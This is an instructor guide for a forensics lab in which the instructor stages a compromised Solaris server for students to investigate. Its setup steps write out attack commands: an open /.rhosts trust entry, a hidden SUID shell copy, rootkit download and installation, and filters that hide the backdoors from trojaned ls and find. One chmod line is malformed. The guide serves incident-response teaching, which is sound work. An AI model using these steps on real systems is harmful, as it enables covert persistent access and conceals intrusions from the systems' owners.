# Instructor Guide for Setting up compromised server Module 7 LAB # Purpose: To teach students how to detect and evaluate a compromised server. This lab is a culmination of the first 6 chapters of SC300 Rev D. Importance: This lab provides practical experience based on real-world case studies of compromised servers. Requirements: o Students will work in teams of 2-4 per compromised workstation. o Choose a workstation that is not being used by a student (if available). o Students will have one hour to answer as many questions as they can. Questions: o When did the compromise take place and what evidence do you have to support it? o From what host did the attacker login from and what evidence do you have to support it? o Which compromised the server and what evidence do you have to support it? o Did the user put any back doors on the server? If so: * What are their names? * Where were they installed? * What do they do? o Was a root kit installed on the server? If so: * What files were replaced? * Where was the root kit downloaded to? SETUP INSTRUCTIONS: Phase I - Setup Backdoors 1) Login remotely to the compromised server as user "bob". 2) Attempt 3 invalid su attempts to root and then login of the 4th attempt. This will clues in the /var/adm/messages and sulog. 3) Setup the following backdoors: # sh # echo "+" > /.rhosts # cp /bin/ksh /bin/pageout # chmod +x 6555 /bin/pageout Phase II - Obtaining and installing root kit 4) Use ftp to copy the root kit from the classroom server. # mkdir /dev/"..." # cd /dev/"..." # ftp server Connected to simms. 220 simms FTP server (SunOS 5.8) ready. Name (simms:root): 331 Password required for root. Password: 230 User root logged in. ftp> cd /usr/local/pkg 250 CWD command successful. ftp> bin 200 Type set to I. ftp> hash Hash mark printing on (8192 bytes/hash mark). ftp> mget sun2* mget sun2.rootkit.tar? y 200 PORT command successful. 150 Binary data connection for sun2.rootkit.tar (10.10.1.10,32816) (1740800 bytes). ############################################################################### 226 Binary Transfer complete. local: sun2.rootkit.tar remote: sun2.rootkit.tar 1740800 bytes received in 0.24 seconds (7001.71 Kbytes/s) ftp> bye 5) Uncompress, unpack and install the root kit. # gunzip sun2.rootkit.tar.gz # tar xvf sun2.rootkit.tar x sun2.rootkit, 0 bytes, 0 tape blocks x sun2.rootkit/me, 859600 bytes, 1679 tape blocks x sun2.rootkit/ls, 41708 bytes, 82 tape blocks x sun2.rootkit/netstat, 6784 bytes, 14 tape blocks x sun2.rootkit/tcpd, 19248 bytes, 38 tape blocks x sun2.rootkit/setup.sh, 1962 bytes, 4 tape blocks <> # cd sun2.rootkit # ./setup.sh hax0r w1th gforce Ok This thing is complete :-) cp: cannot access l0gin cp: cannot create /usr/local/bin/find: No such file or directory mv: cannot access /etc/.ts mv: cannot access /etc/.tp - WTMP: <> Phase III - Configuring the root kit 6) Edit the root kit filter files to hide /.rhosts and /bin/pageout # vi /var/spool/.recent/.files <> bot ... pageout .rhosts /bin/pageout /.rhosts # vi /var/spool/.recent/.find_filter <>|grep -v '/usr/man/man1/.. '|grep -v '.rhosts'|grep -v 'pageout' 7) Make sure the new ls and find trojans hide the .rhosts and /bin/pageout files. # ls -la /.rhosts # ls -l /bin/pageout 8) Logout as root and out as bob. # exit $ exit Connection closed. Phase IV - Creating decoys 9) Login as both users bob and alice to create some activity. 10) Have alice execute the pageout SUID shell. $ pageout # 11) The compromised server is now setup. The students will be responsible for answering some questions.